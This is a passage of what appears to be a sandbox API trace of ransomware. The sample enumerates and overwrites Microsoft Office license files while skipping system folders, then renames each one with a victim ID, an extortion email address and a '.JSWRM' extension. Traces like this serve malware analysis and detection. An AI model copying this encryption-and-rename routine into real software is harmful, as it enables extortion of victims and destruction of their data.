[0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0110.497] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0110.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0110.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0110.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d298, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0110.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0110.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0110.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0110.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0110.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0110.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0110.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0110.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0110.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.498] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11624) returned 1 [0110.498] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0110.498] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0110.501] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.501] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0110.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.501] CloseHandle (hObject=0x45c) returned 1 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0110.501] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0110.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0110.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0110.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.501] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0110.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0110.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0110.503] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb81da9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb81da9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeb928b2b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2590, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_KMS_Client-ul.xrm-ms", cAlternateFileName="ST8D06~1.XRM")) returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0110.503] lstrcmpiW (lpString1="StandardVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241268, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0110.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_KMS_Client-ul.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241178, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0110.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0110.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0110.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.504] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9616) returned 1 [0110.504] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.504] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0110.504] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0110.581] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.581] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0110.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.582] CloseHandle (hObject=0x45c) returned 1 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0110.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0110.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0110.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0110.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0110.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0110.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0110.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0110.584] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb81da9d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb81da9d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeba59def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2987, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="StandardVL_MAK-pl.xrm-ms", cAlternateFileName="ST38E4~1.XRM")) returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="recovery") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="perflogs") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0110.584] lstrcmpiW (lpString1="StandardVL_MAK-pl.xrm-ms", lpString2="msocache") returned 1 [0110.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0110.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0110.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0110.584] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0110.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0110.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0110.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0110.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0110.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardVL_MAK-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0110.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0110.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0110.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0110.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0110.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0110.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0110.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0110.586] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10631) returned 1 [0110.586] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.586] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2980) returned 0x24c1d0 [0110.586] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2980, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2980, lpOverlapped=0x0) returned 1 [0110.588] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0110.589] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2980, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2980, lpOverlapped=0x0) returned 1 [0110.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0110.589] CloseHandle (hObject=0x45c) returned 1 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0110.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0110.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0110.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0110.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0110.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0110.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0110.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0110.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0110.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0110.589] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\StandardVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\standardvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0110.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0110.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0110.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0110.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0110.590] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0110.590] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebbd758f, 